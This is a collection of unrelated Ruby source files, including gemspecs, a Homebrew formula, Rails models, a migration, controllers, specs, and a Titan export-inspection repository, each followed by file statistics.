# line below indicates this file was written by RubyGems at install time;
# edits here do not affect the gem's upstream source.
Gem::Specification.new do |s|
s.name = "globalid"
s.version = "0.3.6"
s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version=
s.require_paths = ["lib"]
s.authors = ["David Heinemeier Hansson"]
s.date = "2015-08-04"
s.description = "URIs for your models makes it easy to pass references around."
s.email = "[email protected]"
s.homepage = "http://www.rubyonrails.org"
s.licenses = ["MIT"]
s.required_ruby_version = Gem::Requirement.new(">= 1.9.3")
s.rubygems_version = "2.4.7"
s.summary = "Refer to any model with a URI: gid://app/class/id"
s.installed_by_version = "2.4.7" if s.respond_to? :installed_by_version
# Dependency declarations, guarded for very old RubyGems versions that
# predate the runtime/development dependency distinction.
if s.respond_to? :specification_version then
s.specification_version = 4
if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then
s.add_runtime_dependency(%q<activesupport>, [">= 4.1.0"])
s.add_development_dependency(%q<rake>, [">= 0"])
else
s.add_dependency(%q<activesupport>, [">= 4.1.0"])
s.add_dependency(%q<rake>, [">= 0"])
end
else
s.add_dependency(%q<activesupport>, [">= 4.1.0"])
s.add_dependency(%q<rake>, [">= 0"])
end
end
| 33.891892 | 105 | 0.651515 |
083d22206ed18ba99b698ad00a7c2a2fc9095ab6 | 359 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# Namespace for the Azure Consumption management API, version 2019-06-01.
module Azure::Consumption::Mgmt::V2019_06_01
  module Models
    #
    # Defines values for CategoryType
    #
    # Enum-style module of allowed category values (string constants).
    module CategoryType
      Cost = "Cost"
      Usage = "Usage"
    end
  end
end
| 21.117647 | 70 | 0.688022 |
1dc70bebccca4ea86ab2338c3f0baf8d17ac6521 | 2,260 | module ActiveScaffold::Actions
module FieldSearch
include ActiveScaffold::Actions::CommonSearch
def self.included(base)
base.before_filter :search_authorized_filter, :only => :show_search
base.before_filter :store_search_params_into_session, :only => [:list, :index]
base.before_filter :do_search, :only => [:list, :index]
base.helper_method :field_search_params
end
# FieldSearch uses params[:search] and not @record because search conditions do not always pass the Model's validations.
# This facilitates for example, textual searches against associations via .search_sql
def show_search
@record = active_scaffold_config.model.new
respond_to_action(:field_search)
end
protected
def field_search_params
search_params || {}
end
def field_search_respond_to_html
render(:action => "field_search")
end
def field_search_respond_to_js
render(:partial => "field_search")
end
def do_search
unless search_params.blank?
text_search = active_scaffold_config.field_search.text_search
search_conditions = []
columns = active_scaffold_config.field_search.columns
search_params.each do |key, value|
next unless columns.include? key
search_conditions << self.class.condition_for_column(active_scaffold_config.columns[key], value, text_search)
end
search_conditions.compact!
self.active_scaffold_conditions = merge_conditions(self.active_scaffold_conditions, *search_conditions)
@filtered = !search_conditions.blank?
includes_for_search_columns = columns.collect{ |column| column.includes}.flatten.uniq.compact
self.active_scaffold_includes.concat includes_for_search_columns
active_scaffold_config.list.user.page = nil
end
end
private
def search_authorized_filter
link = active_scaffold_config.field_search.link || active_scaffold_config.field_search.class.link
raise ActiveScaffold::ActionNotAllowed unless self.send(link.security_method)
end
def field_search_formats
(default_formats + active_scaffold_config.formats + active_scaffold_config.field_search.formats).uniq
end
end
end
| 37.04918 | 124 | 0.734956 |
bbbfa0309026ccb997a54427afbfd5138b42dcba | 930 | Pod::Spec.new do |s|
s.name = "TastyTomato"
s.version = "0.36.0"
s.summary = "The Tasty Tomato."
s.description = <<-DESC
Get all the awesome custom UI elements that
resmio uses to make your App really beautiful!
DESC
s.homepage = "https://github.com/resmio/TastyTomato"
s.license = {
:type => "MIT",
:file => "LICENSE"
}
s.authors = {
"Jan Nash" => "[email protected]"
}
s.platform = :ios, "8.0"
s.swift_version = '5.0'
s.source = {
:git => "https://github.com/resmio/TastyTomato.git",
:tag => "v#{s.version}"
}
s.source_files = "TastyTomato/**/*.swift"
s.ios.resource_bundles = {
'TTLocalizations' => ['TastyTomato/Localizations/*.lproj']
}
s.resources = ['TastyTomato/Images/*.{xcassets, png}']
s.public_header_files = []
s.dependency 'SignificantSpices', '~> 0.11.0'
s.dependency 'SwiftDate', '~> 6.0.2'
end
| 29.0625 | 64 | 0.586022 |
ffa6fbadc99ffff48a61fb8f75ae1c8064e9e1bd | 181 | require 'active_record'
# Join model linking a Delayed::Job row to the (polymorphic) record that owns it.
class DelayedJobTracking < ActiveRecord::Base
  belongs_to :delayed_job, class_name: "::Delayed::Job"
  belongs_to :job_owner, polymorphic: true
end
| 22.625 | 58 | 0.756906 |
4ad89ef1b91a8dbdb0327c669096f51a36735bb8 | 1,157 | class Roswell < Formula
desc "Lisp installer and launcher for major environments"
homepage "https://github.com/roswell/roswell"
url "https://github.com/roswell/roswell/archive/v17.2.8.74.tar.gz"
sha256 "703095b28cc2985494976b708853566225dd70d4beb1359a1eb7f7038332c221"
head "https://github.com/roswell/roswell.git"
bottle do
sha256 "ea88acfbfa12a98720c8ae7b646f7e429242eed2e5ff0264cec28c3c42fa7d13" => :sierra
sha256 "c39b58fab7e29e6ed9a5d7f936bd0f7f270a9c6e4ba4eaeed8ccf9c5d3f5e14b" => :el_capitan
sha256 "c0614998e5c3661fcb0070592e718870f68f1abb9d52d156815bdd0a311c4035" => :yosemite
end
depends_on "automake" => :build
depends_on "autoconf" => :build
def install
system "./bootstrap"
system "./configure", "--disable-dependency-tracking",
"--disable-silent-rules",
"--enable-manual-generation",
"--enable-html-generation",
"--prefix=#{prefix}"
system "make", "install"
end
test do
ENV["ROSWELL_HOME"] = testpath
system bin/"ros", "init"
File.exist? testpath/".roswell/config"
end
end
| 35.060606 | 92 | 0.680207 |
ff225a66674cbea27e27b4944e4db4ebf426a6a5 | 311 | cask :v1 => 'boxcryptor-classic' do
version :latest
sha256 :no_check
url 'https://www.boxcryptor.com/download/Boxcryptor_Installer.dmg'
name 'Boxcryptor'
name 'Boxcryptor Classic'
homepage 'https://www.boxcryptor.com/en/boxcryptor-classic'
license :commercial
app 'Boxcryptor Classic.app'
end
| 23.923077 | 68 | 0.749196 |
acc299d3f3f53149c90a026c111d66b46c237bba | 956 | require 'rails_helper'
# Component spec for ButtonComponent: checks rendered content, the button
# type attribute, and USWDS design-system classes (plain and outline).
RSpec.describe ButtonComponent, type: :component do
  let(:type) { nil }
  let(:outline) { false }
  let(:content) { 'Button' }
  # Only pass options that are explicitly set; `compact` drops the nil type.
  let(:options) do
    {
      type: type,
    }.compact
  end
  subject(:rendered) { render_inline ButtonComponent.new(outline: outline, **options) { content } }
  it 'renders button content' do
    expect(rendered).to have_content(content)
  end
  it 'renders as type=button' do
    expect(rendered).to have_css('button[type=button]')
  end
  it 'renders with design system classes' do
    expect(rendered).to have_css('button.usa-button')
  end
  context 'with outline' do
    let(:outline) { true }
    it 'renders with design system classes' do
      expect(rendered).to have_css('button.usa-button.usa-button--outline')
    end
  end
  context 'with type' do
    let(:type) { :submit }
    it 'renders as type' do
      expect(rendered).to have_css('button[type=submit]')
    end
  end
end
| 22.232558 | 99 | 0.665272 |
7aeb7b75dc2ace689eff7d9a4a0ea2c618d65cf5 | 888 | # frozen_string_literal: true
# Adds a serialized `settings` column to communities and seeds each existing
# community with its meal-reimbursement drop-off location.
class AddSettingsToCommunities < ActiveRecord::Migration[4.2]
  def change
    add_column :communities, :settings, :text, default: "{}"
    # Data backfill. NOTE(review): relies on the live Community model and
    # update_attribute (skips validations) — common in migrations, but brittle
    # if the model changes; `Community.all.each` also loads every row at once
    # (find_each would batch) — presumably fine for a handful of communities.
    Community.all.each do |c|
      c.update_attribute(:settings,
        case c.name
        when "Touchstone"
          {meal_reimb_dropoff_loc: "in the lockbox by the Touchstone Common House office (near the east bathroom)"}
        when "Great Oak"
          {meal_reimb_dropoff_loc: "in the cubby for GO Unit 19 (Kathy) in the Great Oak Common House"}
        when "Sunward"
          {meal_reimb_dropoff_loc: "in the Common Kitchen cubby in the Sunward Common House"}
        else
          c.settings # No change
        end)
    end
  end
end
| 42.285714 | 132 | 0.533784 |
6a1e1620e815f1591c60ff3bbfb6c8ad06bb0dea | 985 | # -*- encoding : utf-8 -*-
#
# Cookbook Name:: ruby_install
# Attributes:: default
#
# Author:: Ross Timson <[email protected]>
#
# Copyright 2013, Ross Timson
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ruby-install release to download.
default['ruby_install']['version'] = '0.5.0'
# SHA-256 of the ruby-install release tarball for the version above.
default['ruby_install']['checksum'] = 'aa4448c2c356510cc7c2505961961a17bd3f3435842831e04c8516eb703afd19'
# Install rubies into /opt/rubies as expected by Chruby.
default['ruby_install']['default_ruby_base_path'] = '/opt/rubies'
| 35.178571 | 104 | 0.750254 |
b9a848ea9f485df40f2ccef9d7c2af69397f1cd3 | 101 | module TinderfieldsUserImpersonate
class ApplicationController < ::ApplicationController
end
end
| 20.2 | 55 | 0.851485 |
f7f0deb751bb4e6cd93d5f3e4a4d49718a81e9ea | 20994 | # frozen_string_literal: true
module FinishedGoodsApp
class TitanRepo < BaseRepo
crud_calls_for :titan_requests, name: :titan_request
def find_pallet_for_titan(pallet_id) # rubocop:disable Metrics/AbcSize
oldest_id = DB[:pallet_sequences].where(pallet_id: pallet_id).order(:id).get(:id)
query = MesscadaApp::DatasetPalletSequence.call('WHERE pallet_sequences.id = ? AND pallet_sequences.pallet_id IS NOT NULL')
hash = DB[query, oldest_id].first
raise Crossbeams::FrameworkError, "Pallet not found for pallet_id: #{pallet_id}" if hash.nil_or_empty?
if hash[:nett_weight_per_carton].zero? || hash[:gross_weight_per_carton].zero?
hash[:nett_weight_per_carton] = get_value(:standard_product_weights, :nett_weight, { commodity_id: hash[:commodity_id], standard_pack_id: hash[:standard_pack_id] })
hash[:gross_weight_per_carton] = get_value(:standard_product_weights, :gross_weight, { commodity_id: hash[:commodity_id], standard_pack_id: hash[:standard_pack_id] })
end
hash[:bin] = get(:standard_pack_codes, :bin, hash[:standard_pack_id]) || false
PalletForTitan.new(hash)
end
def find_pallet_sequence_for_titan(id)
query = MesscadaApp::DatasetPalletSequence.call('WHERE pallet_sequences.id = ?')
hash = DB[query, id].first
raise Crossbeams::FrameworkError, "Pallet Sequence not found for pallet_sequence_id: #{id}" if hash.nil_or_empty?
hash[:pallet_percentage] = hash[:pallet_carton_quantity].zero? ? 0 : (hash[:carton_quantity] / hash[:pallet_carton_quantity].to_f).round(3)
PalletSequenceForTitan.new(hash)
end
def find_titan_request(id)
hash = find_hash(:titan_requests, id)
return nil unless hash
if hash[:govt_inspection_sheet_id]
hash = parse_titan_inspection_request_doc(hash)
hash = parse_titan_inspection_result_doc(hash)
end
if hash[:load_id]
hash = parse_titan_addendum_request_doc(hash)
hash = parse_titan_addendum_result_doc(hash)
end
TitanRequestFlat.new(hash)
end
def last_titan_addendum_request(load_id)
hash = DB[:titan_requests].where(load_id: load_id).reverse(:id).first
return nil if hash.nil?
TitanRequest.new(hash)
end
def parse_titan_inspection_request_doc(hash)
request_doc = hash[:request_doc] ||= {}
request_lines = request_doc.delete('consignmentLines') || []
hash[:request_array] = flatten_to_table(request_doc)
hash[:request_array] += flatten_to_table(request_lines)
hash
end
def parse_titan_inspection_result_doc(hash)
result_doc = hash[:result_doc] ||= {}
result_doc = { 'message' => result_doc } if result_doc.is_a?(String)
result_doc.delete('type')
result_doc.delete('traceId')
result_lines = result_doc.delete('errors') || []
hash[:result_array] = flatten_to_table(result_doc)
hash[:result_array] += flatten_to_table(result_lines)
hash
end
def parse_titan_addendum_request_doc(hash)
request_doc = hash[:request_doc] ||= {}
addendum_details = request_doc.delete('addendumDetails') || []
consignment_items = request_doc.delete('consignmentItems') || []
hash[:request_array] = flatten_to_table(request_doc)
hash[:request_array] += flatten_to_table(addendum_details, prefix: 'AddendumDetails')
hash[:request_array] += flatten_to_table(consignment_items, prefix: 'ConsignmentItems')
hash
end
def parse_titan_addendum_result_doc(hash)
result_doc = hash[:result_doc] ||= {}
result_doc.delete('type')
result_doc.delete('traceId')
result_lines = result_doc.delete('errors')
hash[:result_array] = flatten_to_table(result_doc)
hash[:result_array] += flatten_to_table(result_lines, prefix: 'Error: ') if result_lines.is_a? Hash
hash
end
def find_titan_inspection(govt_inspection_sheet_id) # rubocop:disable Metrics/AbcSize
hash = {}
ds = DB[:titan_requests].where(govt_inspection_sheet_id: govt_inspection_sheet_id).reverse(:id)
return nil unless ds.get(:id)
hash[:govt_inspection_sheet_id] = govt_inspection_sheet_id
hash[:reinspection] = get(:govt_inspection_sheets, :reinspection, govt_inspection_sheet_id)
hash[:validated] = ds.where(request_type: 'Validation').get(:success)
hash[:request_type] = ds.get(:request_type)
hash[:success] = ds.get(:success)
hash[:inspection_message_id] = ds.exclude(inspection_message_id: nil).get(:inspection_message_id)
result_doc = ds.where(request_type: 'Results').get(:result_doc) || {}
hash[:upn] = result_doc['upn']
hash[:titan_inspector] = result_doc['inspector']
hash[:pallets] = []
consignment_lines = result_doc['consignmentLines'] || []
consignment_lines.each do |line|
pallet_number = line['sscc']
pallet_id = get_id(:pallets, pallet_number: pallet_number)
raise Crossbeams::FrameworkError, "Pallet id not found for #{pallet_number}" unless pallet_id
hash[:pallets] << { pallet_id: pallet_id, pallet_number: pallet_number, passed: line['result'] == 'Pass', rejection_reasons: line['rejectionReasons'] || [] }
end
TitanInspectionFlat.new(hash)
end
def compile_inspection(govt_inspection_sheet_id) # rubocop:disable Metrics/AbcSize
govt_inspection_sheet = GovtInspectionRepo.new.find_govt_inspection_sheet(govt_inspection_sheet_id)
{ consignmentNumber: govt_inspection_sheet.consignment_note_number,
bookingRef: govt_inspection_sheet.booking_reference,
exporter: party_repo.find_registration_code_for_party_role('FBO', govt_inspection_sheet.exporter_party_role_id),
billingParty: party_repo.find_registration_code_for_party_role('BILLING', govt_inspection_sheet.inspection_billing_party_role_id),
# inspectionPoint: AppConst::TITAN_INSPECTION_API_USER_ID,
inspectionPoint: govt_inspection_sheet.inspection_point,
inspector: govt_inspection_sheet.inspector_code,
inspectionDate: Time.now.strftime('%Y-%m-%d'),
inspectionTime: Time.now.strftime('%k:%M:%S'),
consignmentLines: compile_inspection_pallets(govt_inspection_sheet_id) }
end
def compile_inspection_pallets(govt_inspection_sheet_id) # rubocop:disable Metrics/AbcSize
pallet_ids = select_values(:govt_inspection_pallets, :pallet_id, govt_inspection_sheet_id: govt_inspection_sheet_id)
govt_inspection_sheet = GovtInspectionRepo.new.find_govt_inspection_sheet(govt_inspection_sheet_id)
inspection_pallets = []
pallet_ids.each do |pallet_id|
pallet = find_pallet_for_titan(pallet_id)
ecert_agreement_id = get_value(:ecert_tracking_units, :ecert_agreement_id, pallet_id: pallet_id)
ecert_agreement_code = get(:ecert_agreements, :code, ecert_agreement_id)
inspection_pallets << { phc: pallet.phc,
sscc: pallet.pallet_number,
commodity: pallet.commodity,
variety: pallet.marketing_variety,
class: pallet.inspection_class || pallet.grade,
inspectionSampleWeight: pallet.nett_weight_per_carton.to_f.round(3),
nettWeightPack: pallet.nett_weight_per_carton.to_f.round(3),
grossWeightPack: pallet.gross_weight_per_carton.to_f.round(3),
carton: pallet.bin ? 'B' : 'C',
cartonQty: pallet.pallet_carton_quantity,
targetRegion: govt_inspection_sheet.destination_region,
targetCountry: govt_inspection_sheet.iso_country_code,
protocolExceptionIndicator: govt_inspection_sheet.titan_protocol_exception || 'NA',
agreementCode: ecert_agreement_code,
consignmentLinePallets: compile_inspection_pallet_sequences(pallet_id) }
end
inspection_pallets
end
def compile_inspection_pallet_sequences(pallet_id) # rubocop:disable Metrics/AbcSize
pallet_sequence_ids = select_values(:pallet_sequences, :id, pallet_id: pallet_id)
inspection_pallet_sequences = []
pallet_sequence_ids.each do |pallet_sequence_id|
pallet_sequence = find_pallet_sequence_for_titan(pallet_sequence_id)
inspection_pallet_sequences << {
ssccReference: pallet_sequence.pallet_number,
palletQty: pallet_sequence.carton_quantity,
ssccSequenceNumber: pallet_sequence.pallet_sequence_number,
puc: pallet_sequence.puc,
orchard: pallet_sequence.orchard,
phytoData: pallet_sequence.phyto_data || '',
packCode: pallet_sequence.std_pack,
packDate: pallet_sequence.palletized_at || pallet_sequence.partially_palletized_at,
# FIXME: remove partially_palletized_at should only use palletized_at
sizeCount: pallet_sequence.actual_count.nil_or_empty? ? pallet_sequence.size_ref : pallet_sequence.actual_count.to_i,
inventoryCode: pallet_sequence.inventory_code,
prePackingTreatment: 'NA'
}
end
inspection_pallet_sequences
end
def find_titan_addendum(load_id, mode) # rubocop:disable Metrics/AbcSize, Metrics/CyclomaticComplexity
return nil if mode == :request
request_type = case mode
when :status
AppConst::TITAN_ADDENDUM_REQUEST
when :cancel
AppConst::TITAN_ADDENDUM_REQUEST
when :load
[AppConst::TITAN_ADDENDUM_STATUS, AppConst::TITAN_ADDENDUM_REQUEST]
end
hash = DB[:titan_requests].where(load_id: load_id, request_type: request_type).reverse(:id).first
return nil unless hash
status_hash = hash[:result_doc] || {}
hash[:addendum_status] = status_hash['addendumStatus']
# hash[:best_regime_code] = status_hash['bestRegimeCode']
hash[:verification_status] = status_hash['verificationStatus']
hash[:addendum_validations] = status_hash['addendumValidations']
# hash[:available_regime_code] = status_hash['availableRegimeCode']
hash[:e_cert_response_message] = status_hash['eCertResponseMessage']
hash[:e_cert_hub_tracking_number] = status_hash['eCertHubTrackingNumber']
hash[:e_cert_hub_tracking_status] = status_hash['eCertHubTrackingStatus']
# hash[:e_cert_application_status] = status_hash['ecertApplicationStatus']
# hash[:phyt_clean_verification_key] = status_hash['phytCleanVerificationKey']
hash[:export_certification_status] = status_hash['exportCertificationStatus']
cancel = DB[:titan_requests].where(load_id: load_id, request_type: AppConst::TITAN_ADDENDUM_CANCEL).reverse(:id).first || {}
cancel_hash = cancel[:result_doc] || {}
hash[:cancelled_status] = cancel_hash['message']
hash[:cancelled_at] = cancel[:updated_at]
TitanAddendumFlat.new(hash)
end
def compile_addendum(load_id) # rubocop:disable Metrics/AbcSize
load = LoadRepo.new.find_load(load_id)
consignor_address = party_repo.find_address_for_party_role('Delivery Address', load.exporter_party_role_id)
consignee_address = party_repo.find_address_for_party_role('Delivery Address', load.consignee_party_role_id)
pallet_ids = select_values(:pallets, :id, load_id: load_id)
ecert_agreement_ids = select_values(:ecert_tracking_units, :ecert_agreement_id, pallet_id: pallet_ids)
ecert_agreement_codes = select_values(:ecert_agreements, :code, id: ecert_agreement_ids).join('')
fbo_code = party_repo.find_registration_code_for_party_role('FBO', load.exporter_party_role_id).to_s
payload = {
eCertRequired: false,
cbrid: 0,
cbrBillingID: 0,
requestId: "#{fbo_code}#{Time.now.strftime('%Y%m%d')}#{load_id}",
eCertAgreementCode: ecert_agreement_codes,
exporterCode: fbo_code,
consignorName: party_repo.find_organization_for_party_role(load.exporter_party_role_id).medium_description,
consignorAddressLine1: [consignor_address&.address_line_1, consignor_address&.address_line_2, consignor_address&.address_line_3].compact!.join(', '),
consignorAddressLine2: consignor_address&.city,
consignorAddressLine3: consignor_address&.postal_code,
consigneeId: party_repo.find_organization_for_party_role(load.consignee_party_role_id).short_description,
consigneeName: party_repo.find_organization_for_party_role(load.consignee_party_role_id).medium_description,
consigneeAddressLine1: [consignee_address&.address_line_1, consignee_address&.address_line_2, consignee_address&.address_line_3].compact!.join(', '),
consigneeAddressLine2: consignee_address&.city,
consigneeAddressLine3: consignee_address&.postal_code,
consigneeCountryId: load.iso_country_code,
importCountryId: load.iso_country_code,
cfCode: party_repo.find_registration_code_for_party_role('CF', load.shipper_party_role_id).to_s,
lspCode: party_repo.find_registration_code_for_party_role('LSP', load.shipper_party_role_id).to_s,
transportType: get(:voyage_types, :industry_description, load.voyage_type_id),
vesselName: load.vessel_code,
vesselType: load.container ? 'CONTAINER' : 'CONVENTIONAL',
voyageNumber: load.voyage_number,
regimeCode: load.temperature_code,
shippingBookingReference: load.booking_reference,
loadPort: load.pol_port_code,
dischargePort: load.pod_port_code,
shippedTargetCountry: load.iso_country_code,
shippedTargetRegion: load.destination_region,
locationOfIssue: load.location_of_issue, # Cannot be blank
eCertDesiredIssueLocation: '',
estimatedDepartureDate: load.etd&.strftime('%F'), # Cannot be blank
supportingDocuments: [
# {
# supportingDocumentCode: '',
# supportingDocumentName: ''
# mimetype: '',
# isPrintable: '',
# # supportingDocument: byte[]
# }
],
consignmentItems: [compile_consignment_items(load)],
addendumDetails: compile_addendum_details(load_id),
flexiFields: []
}
res = validate_addendum_payload(payload)
raise Crossbeams::InfoError, "Invalid addendum request: #{unwrap_error_set(res.errors)}" if res.failure?
res.to_h
end
def compile_consignment_items(load)
pallet_id = select_values_in_order(:pallets, :id, where: { load_id: load.id }, order: :id).first
pallet = find_pallet_for_titan(pallet_id)
{
CommonName: pallet.commodity_description, # Cannot be blank - BUT: "CommonName" (use cultivar?)
ScientificName: pallet.commodity_description, # Cannot be blank - BUT: "ScientificName"
nettWeightMeasureCode: 'KG',
nettWeightMeasure: load.nett_weight.to_f.round(2),
grossWeightMeasureCode: 'KG',
grossWeightMeasure: load.verified_gross_weight.to_f.round(2),
customsHarmonizedSystemClass: '',
commodityVegetableClass: pallet.commodity, # ???
commodityConditionClass: '',
commodityIntentOfUseClass: '',
appliedProcessStartDate: nil,
appliedProcessEndDate: nil,
durationMeasureCode: '',
durationMeasure: '',
appliedProcessTreatmentTypeLevel1: '',
appliedProcessTreatmentTypeLevel2: '',
appliedProcessChemicalCode: '',
fullTreatmentInfromation: '',
appliedProcessTemperatureUnitCode: '',
appliedProcessTemperature: 0.00,
appliedProcessConcentrationUnitCode: '',
appliedProcessConcentration: 0.00,
appliedProcessAdditionalNotes: '',
packageLevelCode: 0,
packageTypeCode: pallet.basic_pack,
packageItemUnitCode: 'EA',
packageItemQuantity: load.pallet_count,
packageShippingMarks: '',
additionalConsignmentNotes: load.memo_pad
}
end
def compile_addendum_details(load_id) # rubocop:disable Metrics/AbcSize
gi_repo = GovtInspectionRepo.new
details = []
pallet_ids = select_values(:pallets, :id, load_id: load_id)
pallet_ids.each do |pallet_id|
pallet = find_pallet_for_titan(pallet_id)
govt_inspection_sheet = gi_repo.find_govt_inspection_sheet(pallet.govt_inspection_sheet_id)
raise Crossbeams::FrameworkError, "Pallet #{pallet.pallet_number} is not on a govt. inspection sheet" if govt_inspection_sheet.nil?
govt_inspection_pallet = gi_repo.find_govt_inspection_pallet(pallet.govt_inspection_pallet_id)
details << {
stuffLoadDate: pallet.shipped_at.strftime('%F'),
loadPointFboCode: AppConst::CR_FG.titan_cold_store_fbo_code,
consignmentNumber: pallet.consignment_note_number,
phc: pallet.phc,
inspectedSSCC: pallet.pallet_number,
clientRef: pallet_id.to_s,
upn: govt_inspection_sheet.upn,
inspectedTargetRegion: govt_inspection_sheet.destination_region,
inspectedTargetCountry: govt_inspection_sheet.iso_country_code,
commodityCode: pallet.commodity,
fleshColour: '', # ???
varietyCode: pallet.marketing_variety,
protocolExceptionIndicator: govt_inspection_sheet.titan_protocol_exception || 'NA',
productClass: pallet.inspection_class || pallet.grade,
nettWeight: pallet.nett_weight.to_f.round(2),
grossWeight: pallet.gross_weight.to_f.round(2), # If derived weight, add this to nett? OR...?
cartonQuantity: pallet.pallet_carton_quantity,
inspectionPoint: govt_inspection_sheet.inspection_point,
inspectorCode: govt_inspection_sheet.inspector_code,
inspectionDate: govt_inspection_pallet.inspected_at.strftime('%F'),
containerNumber: pallet.container,
addendumDetailLines: compile_addendum_detail_sequences(pallet_id)
}
end
details
end
def compile_addendum_detail_sequences(pallet_id)
pallet_sequence_ids = select_values(:pallet_sequences, :id, pallet_id: pallet_id)
sequences = []
pallet_sequence_ids.each do |pallet_sequence_id|
pallet_sequence = find_pallet_sequence_for_titan(pallet_sequence_id)
sequences << {
sequenceNumberOfInspectedSSCC: pallet_sequence.pallet_sequence_number,
puc: pallet_sequence.puc,
orchard: pallet_sequence.orchard,
productionArea: pallet_sequence.production_region,
phytoData: pallet_sequence.phyto_data || '',
sizeCountBerrySize: pallet_sequence.edi_size_count, # Cannot be blank
packCode: pallet_sequence.std_pack,
palletQuantity: pallet_sequence.carton_quantity,
nettPalletWeight: pallet_sequence.sequence_nett_weight.to_f.round(2)
}
end
sequences
end
def party_repo
MasterfilesApp::PartyRepo.new
end
def humanize(value)
array = value.to_s.split(/(?=[A-Z])/)
array.map(&:capitalize).join('')
end
def flatten_to_table(input, prefix: nil) # rubocop:disable Metrics/AbcSize
array_out = []
is_an_array = input.is_a? Array
input = [input] unless is_an_array
Array(0...input.length).each do |i|
if input[i].is_a?(String)
array_out << { column: 'Message', value: input[i] }
else
input[i].each do |k, v|
column = "#{prefix}#{humanize(k)}"
column = "#{humanize(k)}[#{i}]" if is_an_array
column = "#{prefix}[#{i}].#{humanize(k)}" if prefix && is_an_array
array_out << { column: column, value: Array(v).map { |vv| UtilityFunctions.scientific_notation_to_s(vv) }.join(' ') }
end
end
end
array_out
end
private
def validate_addendum_payload(payload)
TitanAddendumPayloadSchema.call(payload)
end
# def sort_like(left, right)
# raise ArgumentError, 'Hash input required for "sort_like" method' unless (left.is_a? Hash) || (right.is_a? Hash)
#
# right_sorted = {}
# left.each do |left_key, left_value|
# right_value = right[left_key]
# if right_value.is_a? Array
# sorted_array = []
# right_value.each do |hash|
# sorted_array << sort_like(left_value.first, hash)
# end
# right_sorted[left_key] = sorted_array
# next
# end
# right_sorted[left_key] = right[left_key]
# end
#
# # check that all keys are present
# right.each do |k, v|
# next if right_sorted[k]
#
# right_sorted[k] = v
# end
#
# right_sorted
# end
end
end
| 48.373272 | 174 | 0.691245 |
9132f38b7710ffc153475bf8ed987de25b6d1cb0 | 2,802 | require 'travis'
# Receives GitHub push payloads and worker callbacks for Travis builds, and
# broadcasts build state changes to clients via Pusher.
class BuildsController < ApplicationController
  respond_to :json
  # github does not currently post the payload with the correct
  # accept or content-type headers, we need to change the
  # the github-service code for this to work correctly
  skip_before_filter :verify_authenticity_token, :only => :create
  # GET — recent builds for the repository identified by params.
  def index
    not_found unless repository = Repository.find_by_params(params)
    respond_with(repository.builds.recent(params[:page]))
  end
  # GET — a single build.
  # NOTE(review): Build.find raises ActiveRecord::RecordNotFound rather than
  # returning nil, so this `not_found unless` guard looks unreachable —
  # confirm whether find_by_id was intended.
  def show
    not_found unless build = Build.find(params[:id])
    respond_with(build)
  end
  # POST — entry point for the GitHub post-receive hook.
  def create
    if build = Build.create_from_github_payload(params[:payload], api_token)
      build.save!
      enqueue!(build)
      build.repository.update_attributes!(:last_build_started_at => Time.now) # TODO the build isn't actually started now
    end
    render :nothing => true
  end
  # PUT — state transitions reported by workers; each branch pushes the
  # matching event to clients (and fans out matrix children when expanded).
  def update
    build = Build.find(params[:id])
    build.update_attributes!(params[:build].except(:queue))
    if build.was_started?
      trigger('build:started', build, 'msg_id' => params[:msg_id])
    elsif build.matrix_expanded?
      build.matrix.each { |child| enqueue!(child) }
      trigger('build:configured', build, 'msg_id' => params[:msg_id])
    elsif build.was_configured? && build.approved?
      enqueue!(build)
      trigger('build:configured', build, 'msg_id' => params[:msg_id])
    elsif !build.approved?
      build.destroy
      trigger('build:removed', build, 'msg_id' => params[:msg_id])
    elsif build.was_finished?
      trigger('build:finished', build, 'msg_id' => params[:msg_id])
      Travis::Notifications.send_notifications(build)
    end
    render :nothing => true
  end
  # PUT — append streaming log output (ignored once the build is finished).
  def log
    build = Build.find(params[:id], :select => "id, repository_id, parent_id", :include => [:repository])
    build.append_log!(params[:build][:log]) unless build.finished?
    trigger('build:log', build, 'build' => { '_log' => params[:build][:log] }, 'msg_id' => params[:msg_id])
    render :nothing => true
  end
  protected
  # Hands the build to a worker queue and announces it with its queue name.
  def enqueue!(build)
    job_info = Travis::Worker.enqueue(build)
    trigger('build:queued', build, job_info.slice('queue'))
  end
  # Pushes an event; a finished matrix child also re-triggers for its parent.
  def trigger(event, build, data = {})
    push(event, json_for(event, build).deep_merge(data))
    trigger(event, build.parent) if event == 'build:finished' && build.parent.try(:finished?)
  end
  def json_for(event, build)
    { 'build' => build.as_json(:for => event.to_sym), 'repository' => build.repository.as_json(:for => event.to_sym) }
  end
  # Queued events go to the 'jobs' channel; everything else to 'repositories'.
  def push(event, data)
    Pusher[event == 'build:queued' ? 'jobs' : 'repositories'].trigger(event, data)
  end
  # API token from HTTP basic auth (the password part of user:token).
  def api_token
    credentials = ActionController::HttpAuthentication::Basic.decode_credentials(request)
    credentials.split(':').last
  end
end
| 31.483146 | 121 | 0.676303 |
1ad027b902611e2af075075260a10c4fdf261b07 | 148 | FactoryBot.define do
factory :shipping_rate, class: Spree::ShippingRate do
cost { BigDecimal(10) }
shipping_method
shipment
end
end
| 18.5 | 55 | 0.722973 |
6a7da7c84d2513d3f52ca90f6e2623545af9bbad | 552 | ENV['CUCUMBER_COLORS'] = nil
$:.unshift(File.dirname(__FILE__))
# For Travis....
require 'cucumber/encoding'
require 'simplecov_setup'
require 'pry'
require 'cucumber'
# Force ANSI colouring on before every example so colour-output assertions pass.
RSpec.configure do |c|
  c.before do
    ::Cucumber::Term::ANSIColor.coloring = true
  end
end
module RSpec
  # Spec helper mixin for marking examples pending on specific platforms.
  module WorkInProgress
    # Marks the example pending when RUBY_PLATFORM is one of `platforms`
    # (a single value or a list, compared by to_s); otherwise runs the block.
    def pending_under(platforms, reason, &block)
      if [platforms].flatten.map(&:to_s).include? RUBY_PLATFORM
        pending "pending under #{platforms.inspect} because: #{reason}", &block
      else
        yield
      end
    end
  end
end
